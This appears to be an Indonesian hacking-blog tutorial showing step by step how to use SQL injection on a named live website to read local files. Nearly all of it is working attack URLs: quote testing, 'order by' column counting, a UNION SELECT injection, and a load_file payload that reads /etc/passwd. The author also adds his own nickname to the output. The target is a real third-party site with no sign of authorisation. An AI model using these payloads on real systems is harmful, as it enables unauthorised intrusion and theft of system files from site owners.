Assalamualaikum warahmatullahi wb Kembali lagi Bro Bersama gw FindinNet Okeh Kali ini gw akan memberikan tutorial SQL TO LFI (SQL TO LOCAL FILE INCLUSION )
Bahan2 Nya
1.Hp
2.crome
3.Kuota
Gass aja langsung ke Tutorial nya
Nih live target http://corrugated.co.id/news_detail.php?id=9
Okeh seperti biasa kalian cari angka Colums nya
Seperti biasa kasih Tanda string '
Contoh : http://corrugated.co.id/news_detail.php?id=9'
Okeh kita order by 1--+-
Contoh : http://corrugated.co.id/news_detail.php?id=9' order by 1--+- No eror
http://corrugated.co.id/news_detail.php?id=9' order by 2--+- Belum eror kita cari angka eror nya kita naikin lagi
http://corrugated.co.id/news_detail.php?id=9'order by 7--+- eror okeh di angka 7 eror kita coba turunin ke angka 6
http://corrugated.co.id/news_detail.php?id=9' order by 6--+- No eror,oke di angka 6 kagak eror kita Union select Sampe angka 6,kenapa Sampe angka 6 bang???
Ya Karena eror nya di angka 7
Gass
http://corrugated.co.id/news_detail.php?id=-9'union+select+1,2,3,4,5,6--+- di Depan param kasih tanda strip atau titik (- .) Kalian bisa liat di depan angka 9 untuk melihat angka togel nya
Togel nya muncul angka 3 Ama 4
Cara eksekusi LFI nya Gimana???
Seperti Ini liat Gambar di bawah
Hapus angka togel nya 4 terus kasih Payload LFI load_file("etc/passwd")
Hasil nya Gini!!!
http://corrugated.co.id/news_detail.php?id=-9%27%20union%20select%201,2,%22kissed%20By%20Findin%22,load_file(%22/etc/passwd%22),5,6--+-
Okeh.Done di angka 3 Kalian bisa tambahkan Nick kalian
Sekian dulu ya tutorial nya semoga bermanfaat bye wassalamu'alaikum warahmatullahi wb Maaf jika ada kesalahan
By FindinNet
Komentar
Posting Komentar